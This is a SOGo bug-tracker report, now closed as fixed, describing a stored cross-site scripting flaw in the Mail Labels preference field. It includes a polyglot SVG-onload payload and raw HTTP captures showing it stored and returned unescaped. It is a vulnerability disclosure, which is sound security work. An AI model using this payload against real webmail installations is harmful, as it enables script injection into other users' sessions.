0006007: Stored-XSS in Mail Labels Field - SOGo | BTS

ID	Project	Category	View Status	Date Submitted	Last Update

0006007	SOGo	Web Preferences	public	2024-08-19 23:59	2024-09-12 06:58

Reporter	julian123	Assigned To	qhivert
Priority	normal	Severity	minor	Reproducibility	always
Status	closed	Resolution	fixed
Platform	[Server] Linux	OS	Ubuntu	OS Version	16.04 LTS
Product Version	5.10.0

Summary	0006007: Stored-XSS in Mail Labels Field
Description	A cross-site scripting payload can be stored in the Mail Labels fields, leading to execution when the user navigates to their inbox.
Steps To Reproduce	Authenticate to the application. Navigate to Preferences > Mail > Labels Select `Create Label` or modify an existing label to include the following payload `//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e` Select `Save` Navigate to the user's inbox and observe the XSS payload execute.
Additional Information	POST /SOGo/so/john@123.com/Preferences/save HTTP/1.1 Host: 192.168.2.96 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://192.168.2.96/ Content-Type: application/json;charset=utf-8 X-XSRF-TOKEN: ac1a2fd18ca6a5119b777957e01d6f71148f1317 Content-Length: 3866 Origin: http://192.168.2.96 DNT: 1 Sec-GPC: 1 Connection: keep-alive ...snip... ],"$label3":["Personal","#009900"],"$forwarded":["Forwarded","#B01FE3"],"label":["//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1111)//>\\x3e","#aaa"]}, GET /SOGo/so/john@123.com/Preferences HTTP/1.1 Host: 192.168.2.96 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: 0xHIGHFLYxSOGo= HTTP/1.1 200 OK Server: nginx Date: Sun, 18 Aug 2024 09:52:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 132477 Connection: keep-alive Strict-Transport-Security: max-age=15768000; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Robots-Tag: none X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin ...snip... },"SOGoCalendarTasksDefaultClassification":"PUBLIC","SOGoPasswordRecoveryMode":"Disabled","SOGoCalendarDefaultReminder":"NONE","SOGoRefreshViewCheck":"manually","SOGoMailAutoSave":5,"SOGoMailLabelsColors":{"$label5":["Later", "#993399"],"$label2":["Work", "#FF9900"],"$label4":["To Do", "#3333FF"],"$label1":["Important", "#FF0000"],"label":["//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1111)//>\\x3e", "#aaa"],
Tags	mail settings

Date Modified	Username	Field	Change
2024-08-19 23:59	julian123	New Issue
2024-08-19 23:59	julian123	Tag Attached: mail settings
2024-08-20 14:08	qhivert	Relationship added	related to 0006010
2024-08-20 14:08	qhivert	Relationship added	related to 0006004
2024-09-12 06:58	qhivert	Assigned To	=> qhivert
2024-09-12 06:58	qhivert	Status	new => closed
2024-09-12 06:58	qhivert	Resolution	open => fixed